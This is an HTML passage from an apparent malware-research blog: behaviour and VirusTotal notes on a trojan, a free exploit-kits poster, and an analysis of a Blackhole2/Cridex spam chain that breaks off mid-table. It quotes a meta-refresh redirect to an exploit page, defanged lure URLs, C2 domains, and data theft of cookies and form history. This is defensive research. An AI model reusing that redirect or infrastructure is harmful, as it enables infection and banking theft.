<li>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.21022)</li>
<li>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)</li>
<li>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)</li>
<li>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)</li>
<li>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)</li>
<li>Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)</li>
<li>Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)</li>
<li>Mozilla/2.0 (compatible; MSIE 3.0; Windows 3.1)</li>
<li>Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)</li>
<li>Microsoft Internet Explorer/1.0 (Windows 95)</li>
</ol>
</blockquote>
<div style="text-align: left;">
System Changes
</div>
<ul style="text-align: left;">
<li><span style="font-family: inherit; line-height: 18.99147605895996px;">Sets to load when Windows is started</span></li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
</div>
<blockquote class="tr_bq">
<i>MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN </i></blockquote>
<div style="text-align: left;">
<i><span style="font-family: inherit; line-height: 18.99147605895996px;"></span>
</i></div>
<ul style="text-align: left;"><span style="font-family: inherit; line-height: 18.99147605895996px;"><i>C</i>hanges Internet Explorer's default home page</span></ul>
<blockquote class="tr_bq">
<i>HKU\S-1-5-21-1715567821-1275210071-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\UserPlayedActive: "DIhnDzXVnPDA+DO4Z72Q5BeL4OTOAPYBa9ef262UWrJ7soV07MpOXsWicda8NBA0tg=</i>="</blockquote>
<ul style="text-align: left;">
<li><span style="font-family: inherit; line-height: 18.99147605895996px;">Makes Windows firewall changes:</span></li>
</ul>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<i>HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: "80:TCP:*:Enabled:Promo"</i></blockquote>
<blockquote class="tr_bq">
<i>HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\53:UDP: "53:UDP:*:Enabled:Promo"</i></blockquote>
</blockquote>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li><span style="line-height: 18.99147605895996px;">Service created SERVICES\NPF (winpcap service) </span>WinPcap Packet Driver (NPF)</li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: inherit; line-height: 18.99147605895996px;">The original copied to</span></li>
</ul>
<blockquote>
<ul><i>C:\WINDOWS\Temp\temp18.exe </i></ul>
<ul><i>C:\WINDOWS\Temp\kb778817.exe -- deleted </i></ul>
<ul><i>C:\WINDOWS\Temp\tmp.exe -- deleted</i></ul>
</blockquote>
<br />
<a href="https://www.virustotal.com/file/55885d1928d39600ce3d99617072bf3632db94352fed8032bc3dce3afe665740/analysis/">Virustotal results of 0c921935f0880b5c2161b3905f8a3069</a><br />
<br />
SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>55885d1928d39600ce3d99617072bf3632db94352fed8032bc3dce3afe665740<br />
SHA1:<span class="Apple-tab-span" style="white-space: pre;"> </span>05ca64ccfa582e7787d0238f82336a079aba8419<br />
MD5:<span class="Apple-tab-span" style="white-space: pre;"> </span>0c921935f0880b5c2161b3905f8a3069<br />
File size:<span class="Apple-tab-span" style="white-space: pre;"> </span>62.5 KB ( 64036 bytes )<br />
File type:<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32 EXE<br />
Tags:<span class="Apple-tab-span" style="white-space: pre;"> </span>peexe<br />
Detection ratio:<span class="Apple-tab-span" style="white-space: pre;"> </span>23 / 46<br />
Analysis date:<span class="Apple-tab-span" style="white-space: pre;"> </span> 2013-02-06 20:08:42 UTC ( 4 days, 2 hours ago )<br />
Agnitum<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.PWS.Tepfer!CPwnyKhdTDg<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
AhnLab-V3<span class="Apple-tab-span" style="white-space: pre;"> </span>Downloader/Win32.Agent<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
AntiVir<span class="Apple-tab-span" style="white-space: pre;"> </span>TR/Crypt.XPACK.Gen2<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
Avast<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32:Dropper-gen [Drp]<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
AVG<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32/Cryptor<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
BitDefender<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.137742<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
Comodo<span class="Apple-tab-span" style="white-space: pre;"> </span>TrojWare.Win32.Kryptik.ASEW<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
DrWeb<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.DownLoader6.380<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
ESET-NOD32<span class="Apple-tab-span" style="white-space: pre;"> </span>a variant of Win32/Kryptik.ASFO<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
F-Secure<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.137742<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
Fortinet<span class="Apple-tab-span" style="white-space: pre;"> </span>W32/Kryptik.XUW!tr<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
GData<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.137742<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
Ikarus<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan-PWS.Win32.Tepfer<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
Kaspersky<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan-PSW.Win32.Tepfer.emee<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
Kingsoft<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32.Troj.Generic.a.(kcloud)<span class="Apple-tab-span" style="white-space: pre;"> </span>20130204<br />
McAfee<span class="Apple-tab-span" style="white-space: pre;"> </span>Artemis!0C921935F088<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
McAfee-GW-Edition<span class="Apple-tab-span" style="white-space: pre;"> </span>Artemis!0C921935F088<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
MicroWorld-eScan<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.137742<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
NANO-Antivirus<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Kryptik.bevkem<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
Norman<span class="Apple-tab-span" style="white-space: pre;"> </span>Kelihos.DA<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
Panda<span class="Apple-tab-span" style="white-space: pre;"> </span>Suspicious file<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
VBA32<span class="Apple-tab-span" style="white-space: pre;"> </span>SScope.Trojan.SB.01722<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
VIPRE<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Generic!BT<span class="Apple-tab-span" style="white-space: pre;"> </span>20130206<br />
<div>
<br /></div>
<br />
<div class="separator" style="background-color: white; clear: both; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
</div>
</div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com2tag:blogger.com,1999:blog-74827929652568895.post-76860341205596525702012-11-11T16:15:00.000-05:002013-05-17T22:18:38.966-04:00Common Exploit Kits 2012 Poster<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; background-color: white; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; color: #222222; float: left; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; margin-right: 1em; padding: 0px; position: relative; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUj-dn7N4vmJVNX2cpcYS4MsR06cFXihi5dpLyr_mM_dEp1eNiH0ZaXX9AlADTRmTw1jGlu1IHhHcA3cAw6cDwqrr09ggzVTt8oRXclHn74Bi5yDlP-AisgsiiFnhrDLQ928DQqlPzeeY/s1600/sandy.JPG" imageanchor="1" style="clear: left; color: #660000; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-decoration: initial;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUj-dn7N4vmJVNX2cpcYS4MsR06cFXihi5dpLyr_mM_dEp1eNiH0ZaXX9AlADTRmTw1jGlu1IHhHcA3cAw6cDwqrr09ggzVTt8oRXclHn74Bi5yDlP-AisgsiiFnhrDLQ928DQqlPzeeY/s200/sandy.JPG" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px; padding: 0px; position: relative;" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 11px; text-align: center;">Hurricane Sandy, Jersey Shore<br />
<span style="font-size: xx-small;">Src. Twitter Oct 28,2012<br /> author unknown</span></td></tr>
</tbody></table>
<div style="text-align: center;">
<span style="color: #f1c232;"><b>Update May 2013 Download any size of 2012 poster - now for <u>free</u> here</b></span></div>
<span style="color: #f1c232;"><b><br /></b></span>
<br />
<div>
<div style="text-align: center;">
<a href="http://www.mediafire.com/?bmbvuqbuzy1x78v">8900 x 6000 px = up to 40" x 60" (101 x 150 cm) </a></div>
<div style="text-align: center;">
<a href="http://www.mediafire.com/view/?8g69j3ykd5dpviz">5340 x 3600 px = up to 24" x 35.6" (~ 61 x 91 cm) </a></div>
<div style="text-align: center;">
<a href="http://www.mediafire.com/view/?8g69j3ykd5dpviz">3578 x 2415 px = up to 16" x 24" (~ 40 x 60 cm) </a></div>
<div style="text-align: center;">
<a href="http://www.mediafire.com/file/p7dxpsvm77l47s4/1780x1200_CommonExploitPacks2012u18.zip">1720 x 1200 px = up to 11"x14" (~ 20 x 30 cm) </a><b></b></div>
</div>
<div>
<br /></div>
<div>
For current information and table listing of exploit packs please visit </div>
<div>
<br /></div>
<div style="text-align: left;">
<div style="text-align: center;">
<b><a href="http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html">Contagio: Overview of exploit packs</a></b></div>
</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div>
-----------------------------------------------------------------------------------------<br />
The poster includes most common exploit packs of 2012. The poster will be updated and new issues posted in the future.<br />
<br />
<div style="text-align: center;">
See Staten Island hurricane aftermath photos here:</div>
<div style="text-align: center;">
<a href="http://lightbox.time.com/2012/11/08/sandys-aftermath-devastation-in-staten-island-by-eugene-richards/#1">Time.com</a> <a href="http://www.nytimes.com/slideshow/2012/11/10/nyregion/StatenIsland-ss.html#1">NY Times</a></div>
If you wish to use your own printing services and/or need multiple copies, you can request the poster file ( jpg 8900 x 6000 px printable to at least 60"x40" or 152cm x 101cm) in exchange for <a href="http://www.silive.com/news/index.ssf/2012/11/donate_to_help_staten_island_r.html">$25 minimum donation to the Hurricane Relief or a charity of your choice</a>. Email us (admin at deependresearch.org) a receipt or proof of a donation done in the past month (you can partially hide/obscure your personal info, if needed) and we will email you the file.<br />
<br />
<br />
You can request the poster file (see sizes below) in exchange for donation to the Hurricane Relief or a charity of your choice. Email us (admin at deependresearch.org) a receipt of a donation made in the past month (you can partially hide/obscure your personal info, if needed) and we will send you the file.<br />
8900 x 6000 px = up to 40" x 60" (101 x 150 cm) = $25 <b><a href="http://www.silive.com/news/index.ssf/2012/11/donate_to_help_staten_island_r.html">Donate here</a></b> or charity of your choice<br />
5340 x 3600 px = up to 24" x 35.6" (~ 61 x 91 cm) = $15 <a href="http://www.silive.com/news/index.ssf/2012/11/donate_to_help_staten_island_r.html"><b>Donate here</b></a> or charity of your choice<br />
3578 x 2415 px = up to 16" x 24" (~ 40 x 60 cm) = $10 <a href="http://www.silive.com/news/index.ssf/2012/11/donate_to_help_staten_island_r.html"><b>Donate here</b></a> or charity of your choice<br />
1720 x 1200 px = up to 11"x14" (~ 20 x 30 cm) = <b><a href="http://www.mediafire.com/file/p7dxpsvm77l47s4/1780x1200_CommonExploitPacks2012u18.zip">Free Download</a></b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5qmqD91aAi4flX9HqSlI9Ee6U6FL-45Us1PXX2n_k4JKxjlB1HOUS43UOo9DTAyO_DURa4KgHJajM7zA7510QSux0IXfN1x9Xf0bc81xV7NWqCrCUZuDWvwiD1mrfH0cRfM4ExJIWkJg/s1600/1780x1200_CommonExploitPacks2012u18.jpg" imageanchor="1" style="color: #660000; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; margin-left: 1em; margin-right: 1em; text-align: center; text-decoration: initial;"><img border="0" height="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5qmqD91aAi4flX9HqSlI9Ee6U6FL-45Us1PXX2n_k4JKxjlB1HOUS43UOo9DTAyO_DURa4KgHJajM7zA7510QSux0IXfN1x9Xf0bc81xV7NWqCrCUZuDWvwiD1mrfH0cRfM4ExJIWkJg/s640/1780x1200_CommonExploitPacks2012u18.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" width="640" /></a></div>
<br />
<br />
<br />
<br />
<a name='more'></a><b>Copyright information:</b><br />
All logos in the images of the fish are trademarks of Adobe Systems, Sun Microsystems, Apple, and Microsoft. The logos are used only for product comparison and academic research reasons that fall within "Fair use" and "Nominative Fair use" limits. If these companies have any concerns, their representatives can contact us via email.<br />
See more here:<br />
<a href="http://en.wikipedia.org/wiki/Nominative_use">http://en.wikipedia.org/wiki/Nominative_use</a><br />
<a href="http://en.wikipedia.org/wiki/Fair_use">http://en.wikipedia.org/wiki/Fair_use</a><br />
<br />
<ul style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; margin: 0.5em 0px; padding: 0px 2.5em;">
</ul>
<div class="separator" style="background-color: white; clear: both; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
</div>
</div>
</div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-14172150892165501202012-10-04T12:56:00.000-04:002012-10-04T14:43:32.395-04:00Blackhole & Cridex: Season 2 Episode 1: Intuit Spam & SSL traffic analysisThe other day, I received another spam email, this time supposedly from Intuit. Since I know that Blackhole2 is now directing to Bugat/Feodo/Cridex banking malware, I wanted to look more closely and see what might be new. The "Intuit" email looked like this, and similar text context is shown below:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3qh-qh_YYTijo-UMxLOGWb07EDsCcCJE6mMn2hkl9jTV12GyAX66F0xnt9BmTOritJaff6MsmWVKdHIW_iI4ruaXZ9U7SLuOuJo_Gkor0FGgFC5XQ0RuSf16JOa_vjG3GFRGShvNOPoZk/s1600/email.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3qh-qh_YYTijo-UMxLOGWb07EDsCcCJE6mMn2hkl9jTV12GyAX66F0xnt9BmTOritJaff6MsmWVKdHIW_iI4ruaXZ9U7SLuOuJo_Gkor0FGgFC5XQ0RuSf16JOa_vjG3GFRGShvNOPoZk/s400/email.png" width="230" /></a><br />
<span style="font-family: Times, 'Times New Roman', serif;">Dear xxxxxxx,</span><br />
<blockquote class="tr_bq">
<span style="font-family: Times, Times New Roman, serif;"></span></blockquote>
<span style="font-family: Times, 'Times New Roman', serif;"> Great News! Your order, QG673260, was shipped today (see details below) and will complete shortly. We hope that you will see that it suit your needs. If you requested multiple products, we may ship them in separate boxes (at no additional cost to you) to ensure the fastest possible delivery. </span><br />
<blockquote class="tr_bq">
<span style="font-family: Times, Times New Roman, serif;">We will also inform you with the ability to track your parcels via the instructions below.</span></blockquote>
<span style="font-family: Times, 'Times New Roman', serif;">Thank you for your order.</span><br />
<blockquote class="tr_bq">
<span style="font-family: Times, Times New Roman, serif;">ORDER DETAILS</span><span style="font-family: Times, 'Times New Roman', serif;">Order #: QG673260</span><span style="font-family: Times, Times New Roman, serif;">Order Date: Sep 25, 2012</span><span style="font-family: Times, Times New Roman, serif;"></span></blockquote>
<span style="font-family: Times, 'Times New Roman', serif;">Item(s) Requested In Your Shipment</span><br />
<blockquote class="tr_bq">
<span style="font-family: Times, 'Times New Roman', serif;">Shipping Date: October, 1 2012</span><span style="font-family: Times, Times New Roman, serif;">Ship Method: TNT</span><br />
<span style="font-family: Times, Times New Roman, serif;">Estimated Delivery Date: October, 3 2012 - October 05, 2012</span><span style="font-family: Times, Times New Roman, serif;"></span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Times, Times New Roman, serif;">Tracking No.: 8178101777788272988726</span></blockquote>
<br />
<br />
<br />
The prolific Cutwail spambot sent the spam email with a lure URL of:<br />
<div style="text-align: center;">
<span style="color: orange;"><span style="font-family: inherit;">hx</span><span style="font-family: inherit;">xp://ladavaz.info/components/com_ag_google_analytics2/croconfrm.html</span></span></div>
<br />
This URL path construction has been used as a redirector to Blackhole exploit sites carried by the popular LinkedIn spam runs, as well as others. For example the following URLs have been used by Blackhole:<br />
<br />
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/croconfrm.html</i></div>
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/fdicsecup.html</i></div>
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/itordernote.html</i></div>
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/Link.html</i></div>
<div style="text-align: left;">
<i>/components/com_ag_google_analytics2/supreqfdic.html</i></div>
<br />
My downloaded "croconfrm.html" contained the following:<br />
<div style="text-align: center;">
<i><span style="color: orange;"></script><noscript><meta http-equiv="refresh" content="0; url=hxxp://art-london.net/detects/stones-instruction_think.php"></noscript></span></i></div>
<br />
<span style="font-family: inherit;">Note: If you attempt to simply wget the php file from a Blackhole2 kit, you will most likely just receive back a harmless dummy file. BH2 needs a "referer", and only one request per IP address. In this case, a simple fetch of the php yielded this:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_guV4AXsAlYH84rsBK8-xzwaZ_izlfbXMWiWulEhQU7SrMTHXIXFRH2l09NkuT-hxh97m7zip-JOk1m4FJZ7hSqpSV1iwmnErlQ9-QSyBynXEEqPS0YrHuJbE-ehDL9yGFXQyDYzxw__J/s1600/wget.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_guV4AXsAlYH84rsBK8-xzwaZ_izlfbXMWiWulEhQU7SrMTHXIXFRH2l09NkuT-hxh97m7zip-JOk1m4FJZ7hSqpSV1iwmnErlQ9-QSyBynXEEqPS0YrHuJbE-ehDL9yGFXQyDYzxw__J/s640/wget.jpg" width="640" /></a></div>
<span style="font-family: inherit;"><br />
</span> <span style="font-family: inherit;">Note the difference when the link is followed via a fresh IP address, and tracked via an intercepting proxy:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqVm05KrUrDso1ozz4MVkk4H5faZhJLLxYPGXZrRZLw0OpX8RZw7vdqMro4qk3Gd5VgH0FQc0QmBLEOOzb1vLY97rrMUYdb5F_3INyeYTQ6hBPzHtxvuxrgn40Wrnb7Tlvm-KlaI6RaDe/s1600/wget1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqVm05KrUrDso1ozz4MVkk4H5faZhJLLxYPGXZrRZLw0OpX8RZw7vdqMro4qk3Gd5VgH0FQc0QmBLEOOzb1vLY97rrMUYdb5F_3INyeYTQ6hBPzHtxvuxrgn40Wrnb7Tlvm-KlaI6RaDe/s640/wget1.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;">I'll make this file available for download at the bottom of the post and leave the decoding as an exercise for the reader. In the meantime, the BH2 kit served up two exploits for me. The first was a PDF file with an </span>MD5 hash <span style="font-family: inherit;">of </span>2d0932026e5a4791ed6fac44df22f91c and <a href="https://www.vicheck.ca/md5query.php?hash=2d0932026e5a4791ed6fac44df22f91c" style="font-family: inherit;">vicheck.ca report seen here</a><span style="font-family: inherit;">. </span> The second file was a PE32 executable with MD5 hash value of 06c6544f554ea892e86b6c2cb6a1700c and the <a href="https://www.virustotal.com/file/ee305b8e80ca0e06147909080435a9eec04532d3054e76102dd6750ef132d907/analysis/">VirusTotal report here</a>.</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"></span><br /></div>
<span style="font-family: inherit;">
</span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaQ_qOii28iSYUjeb7y5EMGZQ9D5gbZ86b1VcInz4nWR3DFFYXdVyM77hEwbMEjlp7bDmJ-98d0nQC46lpfCp9zSRH_wBu1KUfB2lGHma2gxtvmtttxEuEHYcymX4bK1ijMeQn_QYLFM8d/s1600/download_pdf.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaQ_qOii28iSYUjeb7y5EMGZQ9D5gbZ86b1VcInz4nWR3DFFYXdVyM77hEwbMEjlp7bDmJ-98d0nQC46lpfCp9zSRH_wBu1KUfB2lGHma2gxtvmtttxEuEHYcymX4bK1ijMeQn_QYLFM8d/s320/download_pdf.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PDF file dropped from 'art-london.net'</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="clear: right; float: right; margin-bottom: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHdK4fMZfO5PVnAxzvkNray2iN5T_Zn_KqaRqepSUiUjzOrH1ydMNRnxElinU9tNtydIKvQUESpfH1_RvPOyU5WiXZvxGBtyPjCZt8Ycys8T8pd7uluI4zkXrnwKfE7DEJVaX7HpdZbcHf/s1600/download_exe.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHdK4fMZfO5PVnAxzvkNray2iN5T_Zn_KqaRqepSUiUjzOrH1ydMNRnxElinU9tNtydIKvQUESpfH1_RvPOyU5WiXZvxGBtyPjCZt8Ycys8T8pd7uluI4zkXrnwKfE7DEJVaX7HpdZbcHf/s320/download_exe.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">executable file dropped from 'art-london.net'</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<span style="font-family: inherit;"></span><br />
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;"></span>
<span style="font-family: inherit;">Once my test system became infected, it did a DNS query for </span><b style="font-family: inherit;"><span style="color: orange;">droppinleverpro.ru</span></b><span style="font-family: inherit;">, which was offline. It then queried for </span><b style="font-family: inherit;"><span style="color: orange;">tuningferrarisglamour.ru</span></b><span style="font-family: inherit;"> which succesfully resolved to </span><b style="font-family: inherit;"><span style="color: orange;">146.185.220.176</span></b><br />
<br />
<span style="font-family: inherit;">At that point, my infected host established an HTTPS connection with: <b>hxxps://tuningferrarisglamour.ru/savestats/</b></span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLmXdccSNlojr-9ne-eRrXMIT7NdMy8ax9BYg3LcKs7jglmIqNfpZ9FHtEKU5V1_oXiF44D6nuMYrPYARJK0h8f667ek40mC7SoLfOb7OuglRnSUUSfTH4YDBMHVubt42Gf3j7oHpn09q/s1600/dns_query.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLmXdccSNlojr-9ne-eRrXMIT7NdMy8ax9BYg3LcKs7jglmIqNfpZ9FHtEKU5V1_oXiF44D6nuMYrPYARJK0h8f667ek40mC7SoLfOb7OuglRnSUUSfTH4YDBMHVubt42Gf3j7oHpn09q/s400/dns_query.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DNS queries and beginning of SSL session.</td></tr>
</tbody></table>
Examining the traffic via Wireshark or similar will yield no joy as the traffic is SSL encrypted. However by using an intercepting proxy as I described in my post <a href="http://sempersecurus.blogspot.com/2011/12/decoding-malware-ssl-using-burp-proxy.html">"Decoding malware SSL using Burp proxy"</a>, I was able to examine the traffic between my infected host and <b><span style="color: orange;">tuningferrarisglamour.ru</span></b>. The first response off the server was very interesting as it contained a large number of references to financial institutions and login URLs, as well as injection code. This is a much larger list than I saw in <a href="http://sempersecurus.blogspot.com/2012/08/cridex-analysis-using-volatility.html">my last Cridex analysis</a>, plus the injection code was very comprehensive and again covered a large number of institutions. A snippet of the decoded SSL session is seen below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-m-EWwru7-vEbSr2TZUazPKjsDwBJYpsVjRfuM4FaGjsUpxR8NrrzoHHxfHlRMm1lcbP1qRpdxNfw4IMZdlinSV64tsHi70U0doMWaTQHbr1lP8mH1fvpNVgW7lSg0XlsbcdVSbqCq0G/s1600/response_1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="438" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-m-EWwru7-vEbSr2TZUazPKjsDwBJYpsVjRfuM4FaGjsUpxR8NrrzoHHxfHlRMm1lcbP1qRpdxNfw4IMZdlinSV64tsHi70U0doMWaTQHbr1lP8mH1fvpNVgW7lSg0XlsbcdVSbqCq0G/s640/response_1.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">SSL Server response</td></tr>
</tbody></table>
There were several additional POST requests to <b><span style="color: orange;">tuningferrarisglamour.ru</span></b> where it appears that my host's process lists, cookies, bookmarks, form history, and shared objects were sent to the remote server.<br />
<br />
A snippet of this decoded traffic is seen below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
